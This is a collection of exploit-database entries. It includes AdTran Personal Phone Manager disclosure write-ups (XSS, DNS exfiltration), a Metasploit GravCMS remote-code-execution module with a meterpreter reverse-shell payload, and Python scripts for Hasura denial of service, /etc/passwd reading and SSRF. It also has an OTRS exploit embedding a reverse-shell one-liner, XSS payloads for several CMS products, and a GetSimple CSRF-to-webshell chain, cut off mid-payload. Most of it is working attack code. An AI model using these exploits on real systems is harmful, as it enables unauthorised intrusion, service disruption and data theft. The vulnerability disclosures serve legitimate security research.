--Mitigation-- Sanitize any user controlled input in both form fields and URL paramaters to properly encode data so it is not rendered as arbitrary HTML/JavaScript. --Timeline-- - 1/21/2021: XSS Vulnerability was discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication. - 1/22/2021: Placeholder CVE-2021-25679 was assigned by MITRE. - 1/29/2021: A response from AdTran's Product Security Team was received. - 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data. - 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline. - 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice. - 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details. - 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed. - 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release. - 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.

# Exploit Title: Adtran Personal Phone Manager 10.8.1 - 'Multiple' Reflected Cross-Site Scripting (XSS) # Date: 1/21/2021 # Exploit Author: 3ndG4me # Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home # Version: v10.8.1 # Tested on: NetVanta 7060 and NetVanta 7100 # CVE : CVE-2021-25680 # CVE-2021-25680 - Adtran Personal Phone Manager Multiple Reflected XSS --Summary-- The AdTran Personal Phone Manager software is vulnerable to multiple reflected cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research ADTRAN, Inc https://adtran.com --Affects-- - AdTran Personal Phone Manager - Verified on v10.8.1 - **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance. --Details-- The AdTran Personal Phone Manager software is vulnerable to multiple reflected cross-site scripting (XSS) issues. These issues impact at minimum versions 10.8.1 and below but potentially impact later versions as well since they have not previously been disclosed. Only version 10.8.1 was able to be confirmed during primary research. These issues work by passing in a basic XSS payload to vulnerable GET parameters that are reflected in the output without saniztization. This can allow for several issues including but not limited to: - Hijacking a user's session - Modifying a user's configuration settings - Using XSS payloads to capture input (keylogging) -- Proof of Concept -- The following URL parameters were impacted and can be exploited with the sample payloads provided below: - https://example.com/userapp/userSettings.html?emailSuccessMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E - https://example.com/userapp/phoneSettings.html?successMessage=%3Cscript%3Ealert(document.cookie)%3C/script%3E - https://example.com/userapp/phoneSettingsAction.html?formAction=&callForwardingFlag=1&callForwardNumber=SOMEDATA"><script>alert`XSS`</script>&apply=Apply Changes - https://example.com/userapp/directoriesAction.html?formAction=applySpeedDialChanges&callEntryToDelete=&newSpeedDialName(1)=&newSpeedDialNumber(1)=&newSpeedDialName(2)=&newSpeedDialNumber(2)=&newSpeedDialName(3)=&newSpeedDialNumber(3)=&newSpeedDialName(4)=&newSpeedDialNumber(4)=&newSpeedDialName(5)=&newSpeedDialNumber(5)=&newSpeedDialName(6)=&newSpeedDialNumber(6)=&newSpeedDialName(7)=&newSpeedDialNumber(7)=&newSpeedDialName(8)=&newSpeedDialNumber(8)=&newSpeedDialName(9)=&newSpeedDialNumber(9)=&newSpeedDialName(10)=&newSpeedDialNumber(10)=&newSpeedDialName(11)=&newSpeedDialNumber(11)=&newSpeedDialName(12)=&newSpeedDialNumber(12)=SOMEDATA<script>alert`XSS`</script>&newSpeedDialName(13)=&newSpeedDialNumber(13)=&newSpeedDialName(14)=&newSpeedDialNumber(14)=&newSpeedDialName(15)=&newSpeedDialNumber(15)=&newSpeedDialName(16)=&newSpeedDialNumber(16)=&newSpeedDialName(17)=&newSpeedDialNumber(17)=&newSpeedDialName(18)=&newSpeedDialNumber(18)=&newSpeedDialName(19)=&newSpeedDialNumber(19)=&newSpeedDialName(20)=&newSpeedDialNumber(20)=&applySpeedDialChanges=Apply The vulnerable parameters that were identified impact more pages than just the above. Any page that renders a response using the following parameters is impacted by this issue: - emailSuccessMessage - successMessage - callForwardNumber - newSpeedDialNumber(#) --Mitigation-- Sanitize any user controlled input in both form fields and URL paramaters to properly encode data so it is not rendered as arbitrary HTML/JavaScript. --Timeline-- - 1/21/2021: XSS Vulnerabilities were discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication. - 1/22/2021: Placeholder CVE-2021-25680 was assigned by MITRE. - 1/29/2021: A response from AdTran's Product Security Team was received. - 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data. - 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline. - 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice. - 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details. - 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed. - 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release. - 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.

# Exploit Title: Adtran Personal Phone Manager 10.8.1 - DNS Exfiltration # Date: 1/21/2021 # Exploit Author: 3ndG4me # Vendor Homepage: https://adtran.com/web/page/portal/Adtran/wp_home # Version: v10.8.1 # Tested on: NetVanta 7060 and NetVanta 7100 # CVE : CVE-2021-25681 # CVE-2021-25681 - AdTran Personal Phone Manager DNS Exfiltration --Summary-- The AdTran Personal Phone Manager software is vulnerable to an issue that allows for exfiltration of data over DNS. This could allow for exposed AdTran Personal Phone Manager web servers to be used as DNS redirectors to tunnel arbitrary data over DNS. ADTRAN, Inc https://adtran.com --Affects-- - AdTran Personal Phone Manager - Verified on v10.8.1 - **Note**: The affected appliances NetVanta 7060 and NetVanta 7100 are considered End of Life and as such this issue will not be patched. It is recommended impacted users update to an actively supported appliance. --Details-- The AdTran Personal Phone Manager software is vulnerable to an issue that allows for exfiltration of data over DNS. This could allow for exposed AdTran Personal Phone Manager web servers to be used as DNS redirectors to tunnel arbitrary data over DNS. This is achieved by simply making a GET request to the vulnerable server containing a reference to a DNS target that is collecting the tunneled data. This can lead to: - Utilizing exposed AdTran Personal Phone Manager Services as a redirector for DNS based Command and Control - Utilizing exposed AdTran Personal Phone Manager Services as a redirector for DNS based arbitrary data exfiltration -- Proof of Concept -- To exploit the issue all that is necessary is a simple DNS request: GET http://mydns.attack.com/ HTTP/1.1 Host: SOME ADTRAN HOST HERE Pragma: no-cache Cache-Control: no-cache, no-transform Connection: close --Mitigation-- The server should be reconfigured to not perform arbitrary DNS lookups when the Host/Get requests do not match. Additionally scoping requests to only be allowed in the context of the application is ideal. --Timeline-- - 1/21/2021: DNS Exfiltration vulnerability was discovered and documented. A temporary CVE identifier was requested by MITRE. AdTran was also notified with the full details of each finding via their product security contact at https://adtran.com/web/page/portal/Adtran/wp_product_security. A baseline 90 day disclosure timeline was established in the initial communication. - 1/22/2021: Placeholder CVE-2021-25681 was assigned by MITRE. - 1/29/2021: A response from AdTran's Product Security Team was received. - 2/8/2021: The researcher responded to the email acknowledging receipt. The encrypted email contents appeared to be corrupted so a request was made to resend the data. - 2/9/2021: AdTran's Product Security Team replied with a re-encrypted copy of the previous communication made on 1/29/2021. The reasearcher was able to successfully decrypt the contents of this communication. The communication informed the researcher that the disclosed issues targeting NetVanta 7060 and NetVanta 7100 would not be addressed. The justification for this decision is that software support ended in June of 2018, and product EOL occurred in December of 2020. As such AdTran would not be invesitgating the issues leaving the details of the findings as is. The reseacher responded with acknowledgement to the decision and requested support to proceed with full disclosure outside of the previously established 90 day timeline. - 2/11/2021: AdTran's product security team responded to the request for full disclosure. They informed the researcher that they would like to discuss the decision internally first. The researcher acknowledged the request and affirmed they would not procceed with disclosure until further notice. - 3/1/2021: AdTran's product security team reached out to inform the researcher that they would support the full disclosure of the vulnerability at the researcher's discretion. They provided a few details on model names to include as EOL for the disclosure details. - 3/2/2021: The researcher acknowledges the approval and informs the product security team that a link will be provided to any future publications once the vulnerability is publicly disclosed. - 3/3/2021: The researcher begins constructing a private repository to prepare the write ups for release. - 4/17/2021: The researcher publishes the repository for full disclosure and notifies MITRE to update the CVE entry details.

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'GravCMS Remote Command Execution', 'Description' => %q{ This module exploits arbitrary config write/update vulnerability to achieve remote code execution. Unauthenticated users can execute a terminal command under the context of the web server user. Grav Admin Plugin is an HTML user interface that provides a way to configure Grav and create and modify pages. In versions 1.10.7 and earlier, an unauthenticated user can execute some methods of administrator controller without needing any credentials. Particular method execution will result in arbitrary YAML file creation or content change of existing YAML files on the system. Successfully exploitation of that vulnerability results in configuration changes, such as general site information change, custom scheduler job definition, etc. Due to the nature of the vulnerability, an adversary can change some part of the webpage, or hijack an administrator account, or execute operating system command under the context of the web-server user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mehmet Ince <[email protected]>' # author & msf module ], 'References' => [ ['CVE', '2021-21425'], ['URL', 'https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/'] ], 'Privileged' => true, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'DefaultOptions' => { 'payload' => 'php/meterpreter/reverse_tcp', 'Encoder' => 'php/base64', 'WfsDelay' => 90 }, 'Targets' => [ ['Automatic', {}] ], 'DisclosureDate' => '2021-03-29', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ CONFIG_CHANGES # user/config/scheduler.yaml ] } ) ) end def check # During the fix, developers changed admin-nonce to login-nonce. res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin') ) if res && !res.get_hidden_inputs.first['admin-nonce'].nil? CheckCode::Appears else CheckCode::Safe end end def capture_cookie_token print_status 'Sending request to the admin path to generate cookie and token' res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin') ) # Cookie must contain grav-site-az09-admin and admin-nonce form field must contain value if res && res.get_cookies =~ /grav-site-[a-z0-9]+-admin=(\S*);/ && !res.get_hidden_inputs.first['admin-nonce'].nil? print_good 'Cookie and CSRF token successfully extracted !' else fail_with Failure::UnexpectedReply, 'The server sent a response, but cookie and token was not found.' end @cookie = res.get_cookies @admin_nonce = res.get_hidden_inputs.first['admin-nonce'] end def exploit unless check == CheckCode::Appears fail_with Failure::NotVulnerable, 'Target is not vulnerable.' end capture_cookie_token @task_name = Rex::Text.rand_text_alpha_lower(5) # Msf PHP payload does not contain quotes for many good reasons. But a single quote will surround PHP binary's # parameter due to the command execution library of the GravCMS. For that reason, surrounding base64 part of the # payload with a double quote is necessary to command executed successfully. payload.encoded.sub! 'base64_decode(', 'base64_decode("' payload.encoded.sub! '));', '"));' print_status 'Implanting payload via scheduler feature' res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'), 'cookie' => @cookie, 'vars_post' => { 'admin-nonce' => @admin_nonce, 'task' => 'SaveDefault', "data[custom_jobs][#{@task_name}][command]" => '/usr/bin/php', "data[custom_jobs][#{@task_name}][args]" => "-r #{payload.encoded}", "data[custom_jobs][#{@task_name}][at]" => '* * * * *', "data[custom_jobs][#{@task_name}][output]" => '', "data[status][#{@task_name}]" => 'enabled', "data[custom_jobs][#{@task_name}][output_mode]" => 'append' } ) if res && res.code == 200 && res.body.include?('Successfully saved') print_good 'Scheduler successfully created ! Wait for 1 minute...' end end def on_new_session print_status 'Cleaning up the the scheduler...' # Thanks to the YAML update method, we can remove the command details from the config file just by re-enabling # the scheduler without any parameter:) It will leave the only command name in the config file. res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'config', 'scheduler'), 'cookie' => @cookie, 'vars_post' => { 'admin-nonce' => @admin_nonce, 'task' => 'SaveDefault', "data[status][#{@task_name}]" => 'enabled' } ) if res && res.code == 200 && res.body.include?('Successfully saved') print_good 'The scheduler config successfully cleaned up!' end end end

# Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service # Software: Hasura GraphQL # Software Link: https://github.com/hasura/graphql-engine # Version: 1.3.3 # Author: Dolev Farhi # Date: 4/19/2021 # Tested on: Ubuntu import sys import requests import threading HASURA_SCHEME = 'http' HASURA_HOST = '192.168.1.1' HASURA_PORT = 80 THREADS = 300 def create_table(): data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":"CREATE TABLE \"public\".\"test_db\"(\"test\" text NOT NULL, PRIMARY KEY (\"test\") );","cascade":False,"read_only":False}},{"type":"add_existing_table_or_view","args":{"name":"test_db","schema":"public"}}]} endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) r = requests.post(endpoint, json=data) return r def insert_row(): bomb = 'A' * 100000 data = {"type":"insert","args":{"table":{"name":"test_db","schema":"public"},"objects":[{"test":bomb}],"returning":[]}} endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) r = requests.post(endpoint, json=data) return r def DoS(): dups = 'test \n ' * 1000000 data = {'query': 'query { test_db { ' + dups + '} }'} endpoint = '{}://{}:{}/v1/graphql'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) r = requests.post(endpoint, json=data) return r if not create_table().ok: print('something went wrong, could not create table.') sys.exit(1) if not insert_row().ok: print('something went wrong, could not insert row') sys.exit(1) while True: for _ in range(THREADS): print('Starting') t = threading.Thread(target=DoS, args=()) t.start()

# Exploit Title: Hasura GraphQL 1.3.3 - Local File Read # Software: Hasura GraphQL # Software Link: https://github.com/hasura/graphql-engine # Version: 1.3.3 # Exploit Author: Dolev Farhi # Date: 4/19./2021 # Tested on: Ubuntu import requests import sys HASURA_SCHEME = 'http' HASURA_HOST = '192.168.1.1' HASURA_PORT = 80 READ_FILE = '/etc/passwd' def LFI(file): SQLI = "SELECT pg_read_file('../../../../../../../../../{}',0,1000);".format(file) data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":SQLI,"cascade":False,"read_only":False}}]} endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) r = requests.post(endpoint, json=data) return r.json() res = LFI(READ_FILE) try: print(res[0]['result'][1][0]) except: print(res)

# Exploit Title: CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS) # Date: 2021/03/19 # Exploit Author: bt0 # Vendor Homepage: http://www.cmsmadesimple.org/ # Software Link: https://s3.amazonaws.com/cmsms/downloads/14832/cmsms-2.2.15-install.zip # Version: 2.2.15 # CVE: CVE-2021-28935 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28935 ----------------------------------------------------------- If you log into Admin panel and open My Preferences you could be able to exploit XSS in title field Reflected XSS in /admin/addbookmark.php Some payloads that works: "><script>prompt(1)</script><" "><script>alert(1)</script><" 63311';alert(1)//812 //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ------------------------------------------------------------

# Exploit Title: Hasura GraphQL 1.3.3 - Service Side Request Forgery (SSRF) # Software: Hasura GraphQL # Software Link: https://github.com/hasura/graphql-engine # Version: 1.3.3 # Exploit Author: Dolev Farhi # Date: 4/19/2021 # Tested on: Ubuntu import requests HASURA_SCHEME = 'http' HASURA_HOST = '192.168.1.1' HASURA_PORT = 80 REMOTE_URL = 'http://some_remote_addr' def SSRF(url): data = { "type":"bulk", "args":[ { "type":"add_remote_schema", "args":{ "name":"test", "definition":{ "url":url, "headers":[], "timeout_seconds":60, "forward_client_headers":True } } } ] } endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT) r = requests.post(endpoint, json=data) return r.json() res = SSRF(REMOTE_URL) message = '' raw_body = '' try: if 'message' in res['internal']: message = res['internal'].get('message', '') if 'raw_body' in res['internal']: raw_body = res['internal'].get('raw_body', '') except: pass print('Remote URL: ' + REMOTE_URL) print('Message: ' + message) print('HTTP Raw Body: ' + raw_body) print('Error: ' + res['error'])

# Exploit Title: OTRS 6.0.1 - Remote Command Execution (2) # Date: 21-04-2021 # Exploit Author: Hex_26 # Vendor Homepage: https://www.otrs.com/ # Software Link: http://ftp.otrs.org/pub/otrs/ # Version: 4.0.1 - 4.0.26, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1 # Tested on: OTRS 5.0.2/CentOS 7.2.1511 # CVE : CVE-2017-16921 #!/usr/bin/env python3 """ Designed after https://www.exploit-db.com/exploits/43853. Runs a python reverse shell on the target with the preconfigured options. This script does not start a listener for you. Run one on your own with netcat or another similar tool By default, this script will launch a python reverse shell one liner with no cleanup. Manual cleanup needs to be done for the PGP options in the admin panel if you wish to preserve full working condition. """ import requests; import sys; baseuri = "http://10.1.1.1/index.pl"; username = "root@localhost"; password = "root"; revShellIp = "10.1.1.2"; revShellPort = 7007; sess = requests.Session(); print("[+] Retrieving auth token..."); data = {"Action":"Login","RequestedURL":"","Lang":"en","TimeOffset":"-480","User":username,"Password":password}; sess.post(baseuri,data=data); if "OTRSAgentInterface" in sess.cookies.get_dict(): print("[+] Successfully logged in:"); print("OTRSAgentInterface",":",sess.cookies.get_dict()["OTRSAgentInterface"]); else: print("[-] Failed to log in. Bad credentials?"); sys.exit(); print("[+] Grabbing challenge token from PGP panel..."); contents = sess.get(baseuri+"?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt::PGP;SysConfigGroup=Framework").text; challTokenStart = contents.find('<input type="hidden" name="ChallengeToken" value="')+50; challengeToken = contents[challTokenStart:challTokenStart+32]; print("[+]",challengeToken); print("[+] Enabling PGP keys in config, and setting our malicious command"); settings = {\ "ChallengeToken":challengeToken,\ "Action":"AdminSysConfig",\ "Subaction":"Update",\ "SysConfigGroup":"Framework",\ "SysConfigSubGroup":"Crypt::PGP",\ "DontWriteDefault":"1",\ "PGP":"1",\ "PGP::Bin":"/usr/bin/python",\ "PGP::Options":"-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + revShellIp + "\"," + str(revShellPort) + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",\ "PGP::Key::PasswordKey[]":"488A0B8F",\ "PGP::Key::PasswordContent[]":"SomePassword",\ "PGP::Key::PasswordDeleteNumber[]":"1",\ "PGP::Key::PasswordKey[]":"D2DF79FA",\ "PGP::Key::PasswordContent[]":"SomePassword",\ "PGP::Key::PasswordDeleteNumber[]":"2",\ "PGP::TrustedNetworkItemActive":"1",\ "PGP::TrustedNetwork":"0",\ "PGP::LogKey[]":"BADSIG",\ "PGP::LogContent[]":"The+PGP+signature+with+the+keyid+has+not+been+verified+successfully.",\ "PGP::LogDeleteNumber[]":"1",\ "PGP::LogKey[]":"ERRSIG",\ "PGP::LogContent[]":"It+was+not+possible+to+check+the+PGP+signature%2C+this+may+be+caused+by+a+missing+public+key+or+an+unsupported+algorithm.",\ "PGP::LogDeleteNumber[]":"2",\ "PGP::LogKey[]":"EXPKEYSIG",\ "PGP::LogContent[]":"The+PGP+signature+was+made+by+an+expired+key.",\ "PGP::LogDeleteNumber[]":"3",\ "PGP::LogKey[]":"GOODSIG",\ "PGP::LogContent[]":"Good+PGP+signature.",\ "PGP::LogDeleteNumber[]":"4",\ "PGP::LogKey[]":"KEYREVOKED",\ "PGP::LogContent[]":"The+PGP+signature+was+made+by+a+revoked+key%2C+this+could+mean+that+the+signature+is+forged.",\ "PGP::LogDeleteNumber[]":"5",\ "PGP::LogKey[]":"NODATA",\ "PGP::LogContent[]":"No+valid+OpenPGP+data+found.",\ "PGP::LogDeleteNumber[]":"6",\ "PGP::LogKey[]":"NO_PUBKEY",\ "PGP::LogContent[]":"No+public+key+found.",\ "PGP::LogDeleteNumber[]":"7",\ "PGP::LogKey[]":"REVKEYSIG",\ "PGP::LogContent[]":"The+PGP+signature+was+made+by+a+revoked+key%2C+this+could+mean+that+the+signature+is+forged.",\ "PGP::LogDeleteNumber[]":"8",\ "PGP::LogKey[]":"SIGEXPIRED",\ "PGP::LogContent[]":"The+PGP+signature+is+expired.",\ "PGP::LogDeleteNumber[]":"9",\ "PGP::LogKey[]":"SIG_ID",\ "PGP::LogContent[]":"Signature+data.",\ "PGP::LogDeleteNumber[]":"10",\ "PGP::LogKey[]":"TRUST_UNDEFINED",\ "PGP::LogContent[]":"This+key+is+not+certified+with+a+trusted+signature%21.",\ "PGP::LogDeleteNumber[]":"11",\ "PGP::LogKey[]":"VALIDSIG",\ "PGP::LogContent[]":"The+PGP+signature+with+the+keyid+is+good.",\ "PGP::LogDeleteNumber[]":"12",\ "PGP::StoreDecryptedData":"1"\ }; sess.post(baseuri+"?Action=AdminSysConfig;Subaction=Edit;SysConfigSubGroup=Crypt::PGP;SysConfigGroup=Framework",data=settings); print("[+] Now attempting to trigger the command. If this hangs, it likely means the reverse shell started."); sess.get(baseuri+"?Action=AdminPGP"); print("[+] Exploit complete, check your listener for a shell");

# Exploit Title: Moodle 3.10.3 - 'url' Persistent Cross Site Scripting # Date: 22/04/2021 # Exploit Author: UVision # Vendor Homepage: https://moodle.org/ # Software Link: https://download.moodle.org # Version: 3.10.3 # Tested on: Debian/Windows 10 By having the role of a teacher or an administrator or a manager (to have the possibility to create a course): - Create a new course (http://localhost/moodle/course/edit.php?category=1&returnto=topcat) - Give any name , short name, date and other things required. - In "Description" field, click on the "link" button - In the url field, enter the payload : <img src=1 href=1 onerror="javascript:alert(1)"></img> - Create the link, an alert window appears (close it several times so that it disappears) , save the course. ("Save and return") Each time the course description is displayed, the stored xss is activated : activate it by viewing the course, by modifying it, etc.

# Exploit Title: RemoteClinic 2.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 13/04/2021 # Exploit Author: Saud Ahmad # Vendor Homepage: https://remoteclinic.io/ # Software Link: https://github.com/remoteclinic/RemoteClinic # Version: 2.0 # Tested on: Windows 10 # CVE : CVE-2021-30030, CVE-2021-30034, CVE-2021-30039, CVE-2021-30042, CVE-2021-31329 #Steps to Reproduce: 1)Login in Application as Doctor. 2)Register a Patient with Full Name Field as XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)> 3)After Register Patient, go to "Patients" endpoint. 4)XSS Executed. For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/1 #Steps to Reproduce: 1)Login in Application as Doctor. 2)Register a Patient. 3)After Register Patient, a page redirect to Register Report Page. 4)Here is "Symptoms" Field as XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)> 4)After Register Report, Click on home which is "dashboard" endpoint. 5)XSS Executed. For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/5 #Steps to Reproduce: 1)Login in Application as Doctor. 2)Register a Patient. 3)After Register Patient, a page redirect to Register Report Page. 4)When you scroll down page two fields there "Fever" and "Blood Pressure", both are vulnerable to XSS, inject XSS Payload in both Fields: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)> 4)After Register Report, Click on home. 5)Now Click on Report, XSS Executed. For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/8 #Steps to Reproduce: 1)Login in Application as Doctor. 2)Register a New Clinic. 3)Here is four fields "Clinic Name", "Clinic Address", "Clinic City" and "Clinic Contact". All are vulnerable to XSS. 4)Inject XSS Payload in all Fields: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)> 4)Now go to Clinic Directory. 5)Click on that Clinic. 6)XSS Executed. For Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/11 #Steps to Reproduce: 1)Login in Application as Doctor. 2)Create a New Medicine. 3)Medicine Name Field is Vulnerable to XSS, inject with XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)> 4)But there is client side validation on maxlength but not on server side. 4)Change maxlength 30 to 100. 5)Click on Register. 6)Now Click on Show All which is /medicines/ endpoint. 7)XSS Executed. Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/14 #Steps to Reproduce: 1)Login in Application as Doctor. 2)Create a New Staff Member. 3)Here is Chat Field and Personal Address Field are Vulnerable to XSS, inject with XSS Payload: XSS"><img src=x onerror=alert(`XSS-BY-Saud-Ahmad`)> 4)Profile Created. 5)Signout. 6)Now login with that staff member which Chat field and Personal Address field consist of XSS Payload. 7)After Login, go to my profile. 8)XSS Executed. Detail POC: https://github.com/remoteclinic/RemoteClinic/issues/16

# Exploit Title: GetSimple CMS My SMTP Contact Plugin 1.1.2 - CSRF to Stored XSS to RCE # Exploit Author: Bobby Cooke (boku) # Date: 22/04/2021 # Vendor Homepage: http://get-simple.info & # Software Link: http://get-simple.info/download/ # Version: Exploit <= v1.1.1 | Stored XSS <= v1.1.2 # Tested against Server Host: Windows 10 Pro + XAMPP # Tested against Client Browsers: Firefox (Linix & Windows), Internet Explorer # Vendor: NetExplorer # Exploit Description: # The My SMTP Contact v1.1.2 plugin for GetSimple CMS suffers from a Stored Cross-Site Scripting (XSS) vulnerability, that when chained together with the CSRF vulnerability in v1.1.1, allows remote unauthenticated attackers to achieve Remote Code Execution on the hosting server, when an authenticated administrator visits a malicious third party website. The PHP function htmlspecialchars() attempts to sanitize the user-input, but is trivially bypassed by passing the dangerous characters as escaped hex bytes. This allows attackers to breakout of the HTML rendered by the PHP engine, to run arbitrary client-side code within the admins browser; after the admin submits the POST request from the CSRF attack. Since GetSimple CMS suffers from a known PHP code injection vulnerability within the themes edit page, the attacker can ride the admins session to perform a chain of XHR requests within the admins browser. The XHR chain triggered by the CSRF attack will collect the CSRF Token from the themes edit page, and use the token to exploit the PHP Code Injection vulnerability to upload a webshell within every page hosted by the CMS. # Full Disclosure: github.com/boku7/gsSMTP-Csrf2Xss2RCE/ # CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H # CVSS Base Score: 9.6 import argparse,requests from http.server import BaseHTTPRequestHandler, HTTPServer from colorama import (Fore as F, Back as B, Style as S) from threading import Thread from time import sleep FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT def bullet(char,color): C=FB if color == 'B' else FR if color == 'R' else FG return SB+C+'['+ST+SB+char+SB+C+']'+ST+' ' info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G') class theTHREADER(object): def __init__(self, interval=1): self.interval = interval thread = Thread(target=self.run, args=()) thread.daemon = True thread.start() def run(self): run() def webshell(target): try: websh = "{}/webshell.php".format(target,page) term = "{}{}BOKU{} > {}".format(SB,FR,FB,ST) welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST) print(welcome) while True: specialmove = input(term) command = {'FierceGodKick': specialmove} r = requests.post(websh, data=command, verify=False) status = r.status_code if status != 200: r.raise_for_status() response = r.text print(response) except: pass ''' Breakout of the PHP and inject a <script> tag using escaped Hex codepoints to bypass the htmlspecialchars() PHP function htmlspecailchars() only HTML encodes the chars: &"><' "+><script>alert(1)</script> --> \x22\x2b\x3e\x3cscript\x3ealert(1)\x3c/script\x3e PAYLOAD - Replace alert(1) payload above with the XHR Chain to gain RCE - XHR Chain first collects the CSRF token on the theme-edit.php page, then uses the token to inject PHP code into all pages of the CMS via known vulnerable themes component of core application''' def xhrRcePayload(): hexBreakoutOpen = '\\x22\\x2b\\x3e\\x3cscript\\x3e' payload = 'var e=function(i){return encodeURIComponent(i);};' payload += 'var h=\\x22application/x-www-form-urlencoded\\x22;' payload += 'var u=\\x22/admin/theme-edit.php\\x22;' payload += 'var xhr1=new XMLHttpRequest();' payload += 'var xhr2=new XMLHttpRequest();' payload += 'xhr1.onreadystatechange=function(){' payload += 'if(xhr1.readyState==4 \\x26\\x26 xhr1.status==200){' payload += 'r=this.responseXML;' payload += 'nVal=r.querySelector(\\x22#nonce\\x22).value;' payload += 'eVal=r.forms[1][2].defaultValue;' payload += 